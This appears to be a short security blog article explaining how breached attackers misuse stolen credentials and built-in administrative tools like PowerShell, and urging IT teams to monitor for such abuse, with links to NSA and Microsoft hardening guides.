In many data breaches, your IT team or someone else with the right privileges has been co-opted.
By the time an attacker is lifting data from your servers, they are no longer hacking but simply using stolen user credentials and passwords. And in many of those instances, the way they are moving through your environment is not via any custom tools, but by taking advantage of administrative features built into any given Windows or Linux system. At this stage, it is difficult for your traditional threat detection tools to spot an attacker.
This pattern was in place for many of the high profile breaches last year, and for attacks going back tens of years. Use enough tools to get a foothold in an environment, gain increased privileges through post-exploitation tools, and then take advantage of all the great built in operating system functionality to move on to other systems, take data from file servers, etc. This operating system functionality is exposed through many built-in command-line functions and APIs used in your custom code.
It is nothing new that people rely on standard administrative and related super-user capabilities to move throughout systems. We saw plenty of this happening in the 90s and while some of the underlying administrative protocols and commands have changed, we saw many examples of it in 2014. Some of the technology has evolved to be more powerful, such as what Microsoft now provides in PowerShell as part of its modern operating systems. And in watching the evolution of PowerShell as a post exploitation tool we can see history repeating itself as a whole new generation leverages built in OS administrative APIs in post exploitation.
Most IT security teams are so focused on threat detection from a malware perspective that they have not done much in the way of creating monitoring and proper system configuration and architecture to be able to hopefully detect the abuse of administrative functionality within their environment. As we seem to be in the generation of ‘assume breach’ we must realize that such abuse of administrative functionality is a common pattern and one we must do better at detecting as early in the cycle as possible.
There is, of course, no one specific way to detect such patterns of usage within your environment, but rather a variety of changes to your configuration and overall system and network architecture. Your organization might already have some of the right configuration and architecture in place and it might be more lacking in bringing in such administrative views of the world to existing centralized monitoring systems that you have.
While there is no single guide on how to implement such things in your environment I have included links to a few useful best practice guides around better managing and monitoring system and administrative functionality.
- NSA IA – Spotting the Adversary with Windows Event Log Monitoring
- Microsoft – Best Practices for Securing Active Directory
- NSA IA – Reducing the Effectiveness of Pass-the-Hash
None of them are a silver bullet to accomplish this task but hopefully this article and reading through these guides can get your IT security team brainstorming on how better to tackle this challenge in your own environment.